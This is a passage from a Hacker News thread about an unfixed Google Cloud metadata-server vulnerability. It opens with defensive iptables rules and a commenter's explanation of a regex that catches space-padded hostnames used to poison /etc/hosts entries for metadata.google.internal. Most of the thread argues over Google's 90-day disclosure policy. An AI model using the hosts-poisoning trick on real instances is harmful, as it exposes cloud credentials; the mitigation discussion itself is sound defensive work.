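        # cesarb's rule: only root (uid 0) may talk to the metadata server.
        ["iptables", "-A", "OUTPUT", "-d", "169.254.169.254",
         "-m", "owner", "!", "--uid-owner", "0", "-j", "DROP"],
        # tytso's rule: drop DHCP replies from anyone but the expected server.
        ["iptables", "-A", "INPUT", "-p", "udp", "--sport", "67",
         "!", "-s", "169.254.169.254", "-j", "DROP"],
    ]

    for rule in RULES:
        subprocess.run(rule, check=True)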
| floatingatoll wrote:
| != would be a simple non-regex replacement, right? Or are there parts of the exploit hostname that aren't a literal match?
| tytso wrote:
| The reason why I used the regex match is that the attacker might try to add one or more spaces as a prefix and/or suffix, e.g. " metadata.google.internal ", which wouldn't match "metadata.google.internal", but the spaces in the /etc/hosts name would be ignored and it would still be effective in poisoning the /etc/hosts lookup for metadata.google.internal.
| cle wrote:
| The more concerning security finding here is that Google sat on this for 9 months. Assuming the claims hold, this is a serious problem for any security-conscious GCP customers. What other vulnerabilities are they sitting on? Do they have processes in place to promptly handle new ones? It doesn't look like it...
| kerng wrote:
| Agreed. Especially Google's comment in early December about "holiday seasons" seems strange after not having done anything for 2 months already...
| When it comes to others (like Microsoft), Google is always quick to publish their findings, regardless of other circumstances.
| saghm wrote:
| This is especially questionable given the much shorter deadline that Project Zero gives other companies to fix bugs before publishing their vulnerabilities (regardless of whether there's been a fix). It only seems fair that Google should hold itself to the same standard.
| dataflow wrote:
| Project Zero gives Google the same timeline. This had nothing to do with Project Zero, from what I understand.
| breakingcups wrote:
| Project Zero is a (very public) Google project, though. If they stand behind their choices and policies, they should live by them.
| joshuamorton wrote:
| In what way is Google not standing by their policies (for example, have they criticized or tried to prevent this person from disclosing publicly)?
| e40 wrote:
| The clear implication is by not fixing the bug in the same time frame.
| joshuamorton wrote:
| What is the thing being implied? As far as I can tell, Google's position seems to be that "it is best if vuln researchers have the freedom to disclose unfixed issues, especially after reporting them".
| People criticize P0 for publishing issues despite companies asking for extensions. But we're criticizing Google here for... what? They didn't ask for an extension, and they didn't try to prevent this person from disclosing. Where is the hypocritical thing?
| staticassertion wrote:
| They didn't _fix it_ within that timeline. I don't know why everyone is saying "well, they didn't stop disclosure in 90 days", but they didn't _fix it_ in the timeline that they have allocated as being reasonable for all vulns they report.
| jsnell wrote:
| At the limit, what you're saying would mean that vendors should feel obligated to fix issues they don't consider to be vulnerabilities, as long as they're reported as such. That'd clearly be absurd. Is there maybe some additional qualifying factor that's required to trigger this obligation that you've left implicit?
| staticassertion wrote:
| > what you're saying would mean that vendors should feel obligated to fix issues they don't consider to be vulnerabilities
| Why would it?
| > Is there maybe some additional qualifying factor that's required to trigger this obligation that you've left implicit?
| That they consider it a vulnerability seems fine.
| jsnell wrote:
| If you're leaving the determination to the vendor, they could just avoid the deadline by claiming it is not a vulnerability. That seems like a bad incentive.
| There are things that literally cannot be fixed, or where the risk of the fix is higher than the risk of leaving the vulnerability open. (Even if it is publicly disclosed!)
| It seems that we're all better off when these two concerns are not artificially coupled. A company can both admit that something is a vulnerability and not fix it, if that's the right tradeoff. They're of course paying the PR cost of being seen as having unfixed security bugs, and an even bigger PR cost if the issue ends up being exploited and causes damage. But that's just part of the tradeoff computation.
| staticassertion wrote:
| I don't know what point you're trying to make here. Google acknowledges that this is a vulnerability ("nice catch"), Google pushes every other company to fix vulns in 90 days (or have them publicly disclosed, which is based on the assumption that vulns can be fixed in that time), and Google did not fix it in 90 days.
| If you're asking me to create a perfect framework for disclosure, I'm not interested in doing that, and it's completely unnecessary for making a judgment of this single scenario.
| > A company can both admit that something is a vulnerability and not fix it, if that's the right tradeoff.
| Google's 90-day policy is designed explicitly to give companies ample time to patch. And yes, this is them paying the PR cost - I am judging them negatively in this discussion because I agree with their 90-day policy.
| jsnell wrote:
| I am saying that there are things that are technically vulnerabilities that are not worth fixing. Either they are too risky or expensive to fix, or too impractical to exploit, or too limited in damage to actually worry about. Given that the line you drew was that there must be a fix in 90 days if the company agrees it is a vulnerability, the logical conclusion is that companies would end up claiming "not a vulnerability" when they mean WONTFIX.
| If you think this particular issue should have been fixed within a given timeline, it should be on the merits of the issue itself, not just by following an "everything must be fixed in 90 days" dogma. All that the repeated invocations of PZ have achieved is to drown out any discussion of the report itself. How serious/exploitable is it actually, how would it be mitigated/fixed, what might have blocked that being done, etc.? Those would have been far more interesting discussions than a silly game of gotcha.
| (If you believe there is no such thing as a vulnerability that cannot be fixed, or that's not worth fixing, then I don't know that we'll find common ground.)
| staticassertion wrote:
| > Given that the line you drew was that there must be a fix in 90 days if the company agrees it is a vulnerability, the logical conclusion is that companies would end up claiming "not a vulnerability" when they mean WONTFIX.
| OK, but that doesn't apply here, which is why I don't get why you're bringing up _general_ policy issues in this _specific_ instance. Google _did_ acknowledge the vulnerability, as noted in the disclosure notes in the repo.
| So like, let me just clearly list out some facts:
| * Project 0 feels that 90 days is a good timeline for the vast majority of vulns to be patched (this is consistent with their data, and appears accurate).
| * This issue was acknowledged by Google, though perhaps not explicitly as a vulnerability; all that I can see is that they ack'd it with "Good catch" - I take this as an ack of a vulnerability.
| * This issue is now at 3x the 90-day window that P0 considers sufficient, in the vast majority of cases, to fix vulnerabilities.
| I don't see why other information is supposed to be relevant. Yes, vendors in some hypothetical situation may feel the incentive to say "WONTFIX" - that has nothing to do with this scenario and has no bearing on the facts.
| > If you think this particular issue should have been fixed within a given timeline, it should be on the merits of the issue itself.
| That's not P0's opinion in the vast majority of cases - only in extreme cases, to my knowledge, do they break from their 90-day disclosure policy.
| > Not just by following a "everything must be fixed in 90 days" dogma.
| Dogma here is quite helpful. I see no reason to break from it in this instance.
| > Seems like those would have been far more interesting discussions than a silly game of gotcha.
| I'm not saying "gotcha", I'm saying that:
| a) 9 months to fix this feels very high; Google should explain why it took so long, to restore confidence.
| b) The fact that they have an internal culture of 90 days being a good time frame for patching merely makes it ironic - it is primarily the fact that I think this should have been patched much more quickly that would bother me as a customer.
| > (If you believe there is no such thing as a vulnerability that cannot be fixed, or that's not worth fixing, then I don't know that we'll find common ground.)
| Nope, 100% there are vulns that can't be fixed, vulns that aren't worth fixing, etc. But again, Google didn't say this was a "WONTFIX", and they did ack that this is a vuln. If it wasn't possible to fix it they could say so, but that isn't what they said at all; they just said they weren't prioritizing it.
| If it's the case that this simply isn't patchable, they should say so. If they think this doesn't matter, why not say so? It certainly _seems_ patchable.
| jsnell wrote:
| > OK, but that doesn't apply here
| It's not what happened, but it is the logical outcome of what you propose. Right now the rules are simple: "disclosure in 90 days, up to you whether to fix it". What you're proposing is that it is no longer up to the company to make that tradeoff. They must always fix it.
| > That's not P0's opinion in the vast majority of cases - only in extreme cases, to my knowledge, do they break from their 90-day disclosure policy.
| Again, that is a disclosure timeline, not a demand for a fix in that timeline. In general it's in the vendor's best interest to release a fix in that timeline, especially given its immutability. You're trying to convert it into a demand for a fix no matter what. That is not productive.
| > a) 9 months to fix this feels very high; Google should explain why it took so long, to restore confidence.
| So why not argue for that explicitly? It seems like a much stronger approach than the "lol PZ hypocrisy" option.
| staticassertion wrote:
| You're trying to talk about the consequences of my statement, which I'm trying very hard not to talk about, because I don't care. I'm only talking about this very specific instance.
| > Again, that is a disclosure timeline. Not a demand for a fix in that timeline.
| Yes, and it is based on the expectation that a fix within that timeline is practical.
| > You're trying to convert it into a demand for a fix no matter what. That is not productive.
| No, I'm not. You're trying to say that I am, repeatedly, and I keep telling you I don't care about discussing disclosure policy broadly. I'm only talking about this one instance.
| > It seems like a much stronger approach than the "lol PZ hypocrisy" option.
| Take that up with the person who posted about P0 initially. I'm only saying that it's ironic, that I support the 90-day window as being a very reasonable time to fix things, and that going 3x over it is a bad look.
| sangnoir wrote:
| > Google pushes every other company to fix vulns in 90 days (or have them publicly disclosed)
| I believe you're mistaken about the conditional publishing. The 90-day clock starts when Google reports the bug - they _will_ make it public whether or not the vulnerability is remediated (with very few exceptions). By all appearances, Google is very willing to be on the receiving end of that, on the basis that _end users can protect themselves when they get the knowledge_ - in this case, GCE users are now aware that their servers are exploitable and can make changes - like moving to AWS. I think the 90-day clock is a reasonable stance to take, for the public (but not necessarily for the vendor).
| staticassertion wrote:
| I'm totally aware of all of this, and I strongly agree with P0's policy.
| sirdarckcat wrote:
| Might be worth noting: 90 days is how long Google thinks it is reasonable to keep vulnerabilities secret without a fix.
| The longer a vulnerability is kept secret, the more the benefits of the public knowing about it outweigh the risks.
| Not all vulnerabilities can be fixed in 90 days, but they can all be disclosed.
| dataflow wrote:
| The complaint is that Google's stance with Project Zero is "90 days is plenty sufficient; you're a bad vendor if you can't adhere to it", and then Google itself doesn't adhere to it, which implicates them here.
| I see what they're saying if you lump the two together; I just think it makes sense to treat P0 a little independently from Google. But otherwise it's got a point.
| joshuamorton wrote:
| Can you point out the second part, specifically where "you're a bad vendor if..." is either stated or implied by P0?
| See instead https://news.ycombinator.com/item?id=27680941, which is my understanding of the stance P0 takes.
| dataflow wrote:
| > See instead https://news.ycombinator.com/item?id=27680941, which is my understanding of the stance P0 takes.
| That's a common sentiment I just don't buy. People here love to hand-wave about some vague "benefit to the public", and maybe there is some benefit when the vulnerability can be mitigated on the user's side, but that literally _cannot_ be the case for the fraction of vulnerabilities that entities other than the vendor can do nothing about. The only "benefit" is that it satisfies people's curiosity, which is a terrible way to do security. Yet P0 applies that policy indiscriminately.
| > Can you point out the second part, specifically where "you're a bad vendor if..." is either stated or implied by P0?
| As to your question of where this is implied by P0: to me, their actions and the lack of a compelling rationale for their behavior, as I explained above, are already plenty enough to imply it. But if you won't believe something unless it's in an actual quote from them, I guess here's something you can refer to [1]:
| - "We were concerned that patches were taking a long time to be developed and released to users"
| - "We used this model of disclosure for over a decade, and the results weren't particularly compelling. Many fixes took over six months to be released, while some of our vulnerability reports went unfixed entirely!"
| - "We were optimistic that vendors could do better, but we weren't seeing the improvements to internal triage, patch development, testing, and release processes that we knew would provide the most benefit to users."
| - "If most bugs are fixed in a reasonable timeframe (i.e. less than 90 days), [...]"
| All the "reasonable time frame (i.e. < 90 days)", "your users aren't getting what they need", "your results aren't compelling", "you can do better", etc. are basically semi-diplomatic ways of saying you're a _bad vendor_ when you're not meeting their "reasonable" 90-day timeline.
| [1] https://googleprojectzero.blogspot.com/p/vulnerability-discl...
| kerng wrote:
| Both are Google - from an outside view we shouldn't distinguish. Google should hold itself to a consistent bar.
| It highlights how divisions operate in silos at Google, and just because Project Zero generates a lot of positive security marketing for Google, it doesn't mean that the quality bar is consistently high across the company.
| Also, please don't forget this is still _not_ fixed.
| jonas21 wrote:
| I assume they haven't fixed it yet because they don't consider it severe enough to prioritize a fix.
| So the reporter waits >90 days, then publicly discloses. Isn't this exactly how it's supposed to work?
| dataflow wrote:
| The funny thing is I agree with you that Google should hold itself to that bar, but I _don't_ agree that Project Zero is the reason. I think we very much _should_ distinguish Google from P0, and that P0's policy should be irrelevant here; their entire purpose is to be an independent team of security researchers finding vulnerabilities in software, indiscriminately. It seems a number of others here feel similarly (judging by the responses), and ironically support for the position is probably being lost by dragging P0 into the conversation.
| The reason I think Google should hold itself to that bar is something else: Google _itself_ claims to use that bar. From the horse's mouth [1]:
| > _This is why Google adheres to a 90-day disclosure deadline._ We notify vendors of vulnerabilities immediately, with details shared in public with the defensive community after 90 days, or sooner if the vendor releases a fix.
| If they're going to do this to others as general company policy, they need to do this to themselves.
| [1] https://www.google.com/about/appsecurity/
| sirdarckcat wrote:
| Are you suggesting Google make all unfixed vulnerabilities public after 90 days? Would that be even if the finder does not want them to become public? Or just as an opt-out type of thing?
| dataflow wrote:
| I'm only suggesting Google needs to fix everything in 90 days (and reveal the issues afterward, as they consider that standard practice) so they don't _have_ unfixed vulnerabilities past that point. I don't really have opinions on what policies they should have for cases where that isn't followed, though I think even _having_ a policy for that case encourages it not to be followed to begin with.
| sirdarckcat wrote:
| Vulnerability deadlines are disclosure deadlines, not remediation deadlines. There are plenty of vulnerabilities that can't be fixed in that time, and I think it's fair for the public to know about them rather than keeping them secret forever.
| dataflow wrote:
| "Fair to the public" was neither intended to be nor is the concern. Their stance has always been "better for security", and disclosing an unpatched vulnerability is generally worse for security, unless you believe it'll encourage people to fix things by that deadline.
| ithkuil wrote:
| In this case, knowing about the vulnerability allows you to take corrective action. Even if Google cannot fix the root cause, that doesn't necessarily mean there aren't mitigations that can be applied manually by an end user (yes, it sucks, but it's still better than getting hacked).
| dataflow wrote:
| When users can mitigate it, I agree with you (I forgot about that case in the second half of my comment), but there have also been cases where users weren't able to do anything and they disclosed anyway, so that doesn't explain the policy.
| staticassertion wrote:
| I agree - they've been really strict about this too, and have even talked about reducing this window. To go 3x over the window is a bad look.
| VWWHFSfQ wrote:
| Google doesn't hold itself to _any_ standard. At least, not anymore.
| sirdarckcat wrote:
| http://g.co/appsecurity has more details, but the TL;DR is that Google is supportive of people disclosing unfixed bugs after 90 days, which is what happened here.
| tptacek wrote:
| If the people who reported this vulnerability had wanted to disclose it on P0's timeline, they were presumably free to do so.
___________________________________________________________________
(page generated 2021-06-29 23:01 UTC)